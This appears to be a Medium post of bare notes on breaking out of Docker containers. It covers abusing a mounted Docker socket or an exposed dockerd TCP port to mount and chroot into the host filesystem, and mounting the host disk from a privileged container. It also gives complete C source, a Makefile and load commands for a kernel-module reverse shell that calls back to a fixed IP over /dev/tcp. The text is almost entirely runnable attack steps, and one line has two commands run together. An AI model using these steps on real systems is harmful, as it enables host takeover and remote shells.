Container Security-Common issues

A) Docker unix socket mounted in container/Docker tcp socket exposed(Container Breakout-1)-

netstat -a -p --unix | grep docker
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
find / -name docker.sock
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \                                                                                                                                                                 
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
wget https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
curl http://172.17.0.1/docker/docker --output docker_cli
chmod +x docker_cli
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
/usr/sbin/dockerd -H tcp://0.0.0.0:2375
docker -H tcp://0.0.0.0:2375 run --net=host -it ubuntu sh
./docker -H tcp://127.0.0.1:2375 run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

B) Privileged container or all capabilities allowed(Container breakout-2)-

--privileged OR--cap-add=all
mount /dev/sda1 /mnt
chroot /mnt bash

C) Exploiting capabilities-

ps -aux
cat /proc/1/status | grep Cap
capsh --decode=00000000a80525fb
sudo apt-get install -y build-essential linux-headers-$(uname -r)
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
static char command[] = "bash -i >& /dev/tcp/172.17.0.3/8888 0>&1"; //Reverse shell change ip and port if needed

char *argv[] = {
"/bin/bash",
"-c", // flag make command run from option list
command, // Reverse shell
NULL // End of the list
};
static char *envp[] = {
"HOME=/",
NULL // End of the list
};

static int __init connect_back_init(void)
{

return call_usermodehelper(
argv[0], // execution path
argv, // arguments for process
envp, // environment for process
UMH_WAIT_EXEC // don't wait for program return status
);
}

static void __exit connect_back_exit(void)
{
printk(KERN_INFO "Exiting\n");
}

module_init(connect_back_init);
module_exit(connect_back_exit);
obj-m += reverseshell_module.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
wget http://172.17.0.1:8000/rev_module.ko
chmod +x rev_module.ko; insmod rev_module.ko

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store